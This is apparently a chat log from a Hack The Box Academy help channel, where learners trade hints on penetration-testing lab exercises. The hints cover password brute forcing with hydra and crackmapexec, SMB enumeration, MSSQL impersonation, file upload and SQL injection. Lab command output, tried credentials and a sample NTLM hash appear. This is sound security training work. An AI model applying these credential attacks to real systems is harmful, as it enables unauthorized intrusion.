🎵 Trying to get themselves banned, and we all watch and laugh.🎵
You've already been told no. Continuing this will result in moderators being involved
I got the answer for the second question. It's the directory I mentioned finding already.
Yes, exactly.
The first question actually works exactly the same way.
Just call /flag.txt.
Okay, that was tooooo easy! I thought I had to have the specific directory and that it wasn't going to be just in root. Thank you for your help! I really appreciate it!
People often tend to want to solve things in a way that is far too complicated. Happens to me all the time
Hello everyone! I'm a little stuck in the last question on the PIVOTING, TUNNELING, AND PORT FORWARDING: Skills Assessment. I've found the DC on 172.16.10.5 because it's a Windows machine. But I can't access it by RDP. Can someone give me some tips?
Using ||CI4/RCE6|| into the ||import||? Hrm, I tried that one.
I really appreciate it! I was beginning to lose hair. LOL!
Are you stuck in the 3rd question? Did you do a port scan to check to see if the RDP port is open?
||try other RCE numbers||
I'm stuck in the last question, about DC
Ah! Got it. That ||version column|| is super confusing! Thanks a lot for the hints! Now I can sleeeeeeeeeeeeeeep!
my recent work that will hack the mind to reality
Eh it's not relevant to this channel
it is relevant to life
congratz! love this module. very challenging and my brain wrinkles worked hard
It's not relevant at all
this channel would not exist if it wasnt for this message
Not really
This channel exists for http://academy.hackthebox.com
Definitely a challenging module, but not as brutal as the AD Enumeration and Abusing HTTP Mechanisms. I just had a habit of overthinking and analyzing this one. I got stuck trying to figure out how to obtain the "user-id" of the dnsmasq, because I thought it meant a process, not a user (- -)
In introduction to windows command line, section finding files and directories
the where command doesn't work
i get 0 output
make sure you have an administrative cmd prompt and you are in the root folder of the drive
this is one approach
Hello, I am trying to do the dictionary attack on SSH service for user "sam" on this https://academy.hackthebox.com/module/147/section/1391 (Password Mutations).
My mutated wordlist is about 1000 words.
Do you have suggestions about performance considerations using CME and hydra to do the password attack on the SSH service ?
I have tried hydra with 60 threads but am getting a lot of connection errors...
The attack seems to be going to take quite a long time. I am wondering if this is the intended way of the module or not ?
Hi, need help with the following:
Module: Shells & Payloads
Section: The Live Engagement
Question: Host 2 - Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt.
After running the exploit inside msfconsole i get the following error: "Exploit failed: NoMethodError undefined method `split' for nil:NilClass". Any idea on what am i possibly doing wrong?
filter for words that start with b/B
why ? were there hints about this ?
somewhere here in the channel, this will reduce the time and words that will be used for bruteforcing
Thanks for the hint, but I am looking for the realistic approach : if I am facing this in the exam, I won't have a hint on the first letter of the password you know...
I don't master enough the tools yet to be sure to use them correctly :
- Do you know if there are good tutorials on how to "tune" hydra to get the best results ? or should I just use -t 64 and let it adapt ?
- Should I also make modification to the default settings like the time to wait for a response (-w) or time between connects per thread (-W) ?
- or perhaps cme may be faster than hydra ? from my testing, changing the number of threads using -t didn't make much difference...
Is this normal to be that slow or am I doing something wrongly ?
haven't done the exam, therefore my feedback will be not the greatest example
you adjust as per the password policies, weak passwords and etc that you have gather as info
the exercise in the section is a bit of an overkill, since you are generating a humongous password list that will take more time for brute forcing with it compared to the lifetime of the target
I have seen that hydra offer a resume feature, might the challenge be that long to solve specifically for the student to learn how to resume when the target goes down ?
It didnt work
Adding to this, looking at a realistic approach, you would have to review the wordlist if you've generated+mutated with a tool. For the section, once you mutate, there are duplicates which you need to remove. The first 1000ish lines are numbers with special characters and the chances of that being a password is very low, so you'd remove that.
Finally, with this refined wordlist, you just hope that you get the password.
¯_(ツ)_/¯
To me, it only showcases the mutations
Also, they recommend to use -u option in Hydra as it rotates the usernames with each password instead. Which makes chances of hitting the password sooner.
Hey! Im having a bit of a problem.
Module: ATTACKING COMMON SERVICES
Question: What is the password for the username "jason"?
Tried brute forcing SMB using crackmapexec and metasploit (smb_logon) via passwords.list (acquired from the resources). No luck.
what to do now?
Then something must be wrong with your command
I get nothing at all
And it gives me the output in 1 second
or less
I tried resetting the box
it didnt help
Check the section, there is something that you are forgetting
Wdym?
basically, read the material again
But no matter what i want to get
where doesn't work
like
where cmd
doesn't work
Yes, because you are missing something, and please type on one line
--local-auth
on the exercice I am on, there is only user "sam" to attack
there is also an FTP and SMB service running on the target, may I attack them instead of attacking SSH or would this be out of the exercice "rules" ?
play around and find out, thats what are the exercises for
no one will stop you from finding another way of doing a X thing
sure, but I won't be confident if I use an "easy" path and don't know how to do it with an harder path (as said, I am not sure to use properly tools parameters)
Always go for the services that let you brute-force faster.
When it comes to this particular module, I'd say try not to take realism into too much consideration.
Just keep the important points from the module in mind. Take notes. I haven't attempted the exam myself but I think it'll be enough to serve you well in the exam.
keep going, reduce the surface, where could waldo be
if you can't find it from the C:\ directory go somewhere else, who can hide waldo
can it be a system, service account on else that can hide him
Aaaa this is a easy module lmao
Like grade "easy"
I had to connect with rdp instead of ssh as specified because when i connected with ssh it didnt give me any output
but now i am getting some output
ohh well.. thanks its worked.
but i dont understand what this flag does. Could you please explain it to me?
Adding --local-auth to any of the authentication commands will attempt to log on locally.
sooo.. it tries to authenticate locally instead to the DC?
You should be able to share screenshots
I did, but they got deleted
If they contain spoilers then yeah they'll probably get deleted by a mod
Iirc you only need to verify to be able to share screenshots
They contained nothing, i tried a command and got 0 output
Lol
Then i tried on the shell and got a weird error, but ill look into it tomorrow, i have school and need to go to bed now hehe
Yo I do not like credential hunting
Dming is a 2 party consent.
lol ok
From script kiddie to pro hacker 🤪
My game plan is to not start climbing until after I get CPTS
After trying all the words starting with a b (lower and uppercase) as suggested by @autumn pilot again the SMB service, it seems that attacking SMB was not a good solution... no valid password found. Will retry using SSH after all...
my game plan is doing the easy and medium machines that they release weekly
while im doing the modules
im moving to medium now that i know i can solve easy machines solo
Same here, CPTS is priority and I'm hitting OSCP the moment I pass CPTS.
Don't need to do ssh, smb should work. His pass starts with b/B. Did you create the mutated password list using the provided wordlists in resources?
Yeah once I pass CPTS I will feel confident in passing OSCP
i will just get the htb exams
the CPTS and the CBBH
what wordlist should i use for the passwords in the Mail Services section in Attacking common services?
i used the wordlist they provide and it isnt the correct one
Hi @livid wing , did u get any answers on this? because I have the same doubt! Thanks
yes :
```
$ cat mut_password.list | wc -l
94044
$ cat mut_password.list | grep -E '^[bB].*' | wc -l
6680
```
u doing password attacks module?
yes
what question
the question on password mutations
it is just mutate the password wordlist
with the rule they provide
and bruteforce it with hydra
what services do the target have opened?
I previously asked about how to fine tune hydra (or cme) to solve this question since it takes ages to attack SSH and the wordlist is huge. People here told me to just try password starting with letter b
I tried this against smb service and got no success
what ports are open
ftp smb ssh
did u try in the ftp?
try it
it depends on the network if im right
I've been having issues lol smbv1 not supported with hydra, cme worked though
But ftp should also work
did you solve it with the whole wordlist of 94k passwords ? (against ftp)
yea
how long did it take (approx)
i dont remember
you had to respawn the target ?
but it takes long i think
I would suggest -t 48
wow, really fast
will try again using FTP thx
no, I want it to be realistic (at least after being sure to type the correct command line 😄
@fathom pendant what wordlist did u use for the password in Attacking Common Services
Did you include the domain?
no
:)
in the section they dont use the domain with hydra
Are you using the full username then ? m*@domain?
@fathom pendant one question i always do it with imap or imaps
the cheatsheet is the same for pop3 and smtp?
Not quite
There should be a list of SMTP commands on the page
But generally to retrieve said emails you'll use a different service. Perhaps the service that hydra tells you
SMTP, IMAP, POP3 fall under the email umbrella
In Documentation and Reporting Skills practice lab, I'm looking for the command injections finding. I know it's not necessary for completion, but it'd be cool to know where it is for science.
For God's Sake.. can someone help me with this.. i've been stuck on this until my eyes are red
ATTACKING COMMON APPLICATIONS ==> Exploiting Web in Thick-Client Applications
Well right in the SQL PART === i have done everything to my best understanding and then complied the program but when i executes it nothing shows up
is it just a roll of the dice if zap hud works? I have not been able to get it to work at all. different browsers , parrot \ pwn \ kali, reinstallation etc... never get it to work.
@summer lava You can PM me with details
hello , Can someone help me with the File Upload Attacks module, Limited File Uploads section Q2 (Try to read the source code of 'upload.php' to identify the uploads directory, and use its name as the answer. (write it exactly as found in the source, without quotes)
I'm in the Skills Assessment for File Upload Attacks and no matter how I craft my payload, I get Only images are allowed. I've tried fuzzing for both the extension and the content-type. I get the same response. Anyone know a way around this?
This one is actually pretty easy. Just use the base64 script that's provided in the section. It will give you the path near the top of the decoded information.
can i dm you ?
Sure.
How do I do this stuff.
I can't believe how awful this mutated password list module is
someone i can ask to upgrade a webshell?
I'd just go ahead and ask and see what you get back
could i ask which one would you recommend after that one? i finished that one
Whatever happens to interest you
hello guys. i got some problem in footprinting module in smb client section.
```
smbclient -N -L //10.129.37.196

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        sambashare      Disk      InFreight SMB v3.1
        IPC$            IPC       IPC Service (InlaneFreight SMB server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
```
I'm still stuck on the File Upload Attacks assessment. Nothing so far has worked. I can't even seem to get the source code. Is anyone available to assist with this assessment?
What is your actual question?
there is problem with NT_STATUS_INVALID_NETWORK_RESPONSE i guess
Try resetting the lab
Or switch from TCP to udp for your VPN config
Or UDP > TCP
Note you will need to stop your current OpenVPN process and start a new one with the new download
got you thanks
I just tried the same thing you did and it works just fine for me
i did try but didnt work
It gave you a valid response so not sure what the error is
its still same stuff showed
```
smbclient -N -L //10.129.202.5

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        sambashare      Disk      InFreight SMB v3.1
        IPC$            IPC       IPC Service (InlaneFreight SMB server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
```
any other advices??
That looks like something with your machine not the lab
What VPN server are you on?
pwnbox?
yes
eu
Yea I'm having no issues on us-1. Try switching VPN regions
Also you should not be running VPN on your own vm and pwnbox at the same time, this can cause connection issues
Is it worth it to just keep working through HTB Academy job role learning paths but not getting certs? I think I want to complete both job role paths in 5 months would be an excellent goal. I’m thinking I could do that while working on HTB main platform boxes that correspond to each module? What do you think?
I care more about skills than certs
Please be honest btw
It's still learning
But what I am really asking is if it’s doable in five months assuming I have completed information security foundations skill path
I’m fairly devoted. I spend A LOT of time on hack the box
Let’s say I am a fast learner
Can it be done in five months and still have all the skill from it?
Basically what’s a good goal to set
I mean yeah
```
$ npm install -g http-server # install dependency
$ http-server -p 8000
```
are you passed skills assessment yet?
Yes, and I'm going to bed.
can i dm you?
Dude, that was 4 months ago lol
Can you try -N without -L?
double check you have the right one. One of those labs has multiple ccache files for the user but only one is actually valid.
dig is a great tool. But what exactly did you try?
Send me the subdomains you found via DM so we don't spoil here.
Can i get some help on a module?
I am trying to print the home Directory of a user and I managed to find it but the answer field is not taking it.
which module, which section, which question?
my bet would be linux fundamentals
Linux basics/ fundamentals
guys i need to know if something of my personal information is in danger
You mind if I DM you as I do not want to give a free answer away
make sure you have SSH into the target
sure, send me a dm
Hello, I want to create a hackathon on https://www.hackthebox.com/, where is the entrance?@
Hi , I am finishing Cracking Passwords with Hashcat module, at the last question of skills assessment I got a little help and I was told that it is the last part that is the hash, but I was wondering what is the rest of it eg in this:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: and how am I supposed to know which part is the hash?
Medium
If you are a penetration tester, you’re probably heard all the fuss about Impacket. Just in case you haven’t heard, Impacket is a series…
thanks.. a lot of things here that I don't understand. I have only done the basic toolset path so far.
2 𝚓𝚞𝚗𝚎 𝚖𝚢 ʙɪʀᴛʜᴅᴀʏ 𝕡𝕝𝕫 🆆🅸🆂🅷 🄼🄴
@everyone
Does anyone have any issues with RDP maintaining a connection over the VPN? Doing the footprinting medium lab and my connection drops a lot despite my speed being stable etc?
Are you using TCP for VPN, or UDP?
Was just using the default config provided, so whatever it is. I've stepped away but will check later
Default should probably be UDP. I'd try redownloading the VPN, and selecting TCP.
Will try whatever the opposite is of what I am using. But now you mention it makes sense to use TCP for this
Didn't even realize separate options were provided
Thanks
Hi, I am unsure if this is the correct place for me to ask. Is anyone able to guide me with regards to Module ( Introduction to Networking )? How do I calculate to get the 2nd subnet? "Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet"
You can use a Subnet Calculator
Subnet calculator performs network calculations using IP address, mask bits, determines the resulting broadcast address, subnet, and more. Try Site24x7's Online IPv4 subnetting calculator for free.
Thank you !
there is nothing more satisfying than solve a box first try 🙂
Thank you ! I managed to get the answer !
Iirc the hashes are explained
yes it worked thanks everybody
Greetings All, on the last question in Password Attacks - Network Services module: "Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." I'm able to see the shares and access one of them but am getting denied access when attempting to dir or ls...anyone have any idea what I'm missing?
hey guys, I'm on the Pass the Ticket (PtT) from Windows questions in the Password Attacks module and
I'm experiencing problems rdp-ing into the target with the creds provided for the first question. Did anyone have similar issues?
Did you find the user?
you need to log in to be able to see files
@fathom pendant yes I found the user and password and am able to get the smb prompt
why would I use any password when I'm able to get into the smb share
with an authed user
I'm asking if it accepts the user and any password
negative from what I've seen thus far
Gotcha
single quote the password since it contains special chars which means something for bash
worked like a charm! thank you, i still don't have the instinct to check for special characters
no instinct here either, just read the bash man page but glad the problem is solved
someone could give me a nudge for Attacking Common Services - Hard
I got rdp to user ||f*||
i tried all the wordlists for the user ||j*||
check another service, you already have what's needed
i already tried the mssql, rdp and smb
dig deeper on the first
i used 4 wordlists with each user
||have you tried the same creds for fiona used to access RDP in order to access the mssql service?||
🙃
perhaps there is a more intuitive tool for the purpose
so problem solved?
I did not use any "tool", I guess there are multiple ways to solve the lab
Because giving a direct answer or giving a solution doesn't help learning
Why are you even here? Your entire account is a gigantic red flag
Hate woman 
not the best server to troll 
someone could give me a nudge for attacking common services - hard
i got impersonate as ||j*|| in the sql server
Check if there are other SQL servers
yea i found the user ||*admin||
oh i got what i have to do
i dont need to login there
just use the command ||execute||
Check if there are other ||linked|| SQL servers
got the flag ty
Dammit bnnuy beat me to it
Can someone help me with the Broken Authentication module, Predictable Reset Token "Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?"
stuck on this for 3 hours
You have to calculate your tokens based on the returned server time and not on your local time
Is there an option in cme that retries for Connection Error:
```
SMB 10.129.244.10 445 ATTCSVC-LINUX [-] \jason:alexis STATUS_LOGON_FAILURE
SMB 10.129.244.10 445 ATTCSVC-LINUX [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 10.129.244.10 445 ATTCSVC-LINUX [-] \jason:samson STATUS_LOGON_FAILURE
SMB 10.129.244.10 445 ATTCSVC-LINUX [-] \jason:5150 STATUS_LOGON_FAILURE
```
Yo
I'm advanced SQL INjection
I have a problem with this question
Inside AuthController.java there is an SQL injection vulnerability within an INSERT query. Which variable can NOT be used for exploitation?
I have use all the variable and none of them are work
any ideas at all ?
sorry I don't get it
btw congrats for the role
When you click on the button, you will be shown a time
Ok and then


